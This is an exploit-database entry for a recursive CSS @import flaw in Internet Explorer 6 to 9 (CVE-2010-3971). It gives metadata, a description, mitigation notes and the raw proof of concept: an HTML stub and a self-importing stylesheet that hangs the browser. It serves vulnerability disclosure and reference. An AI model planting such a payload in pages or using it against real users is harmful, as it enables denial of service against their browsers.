header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Unidentified researcher using WooYun anonymous account '路人甲'
7,8
CVSS
HIGH
CSS Import Recursive Load Vulnerability
20
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 6
Affected Version To: Microsoft Internet Explorer 9
Patch Exists: Yes
Related CWE: CVE-2010-3971
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

CSS Import Recursive Load Vulnerability

This vulnerability allows remote attackers to cause a denial of service (DoS) condition on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of CSS import directives. By specifying a recursive import directive, an attacker can cause the browser to enter an infinite loop, consuming all available CPU resources.

Mitigation:

Microsoft released a security advisory for this vulnerability in December 2010.
Source

Exploit-DB raw data:

<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>

<code of css.css>
*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>


Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885

* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx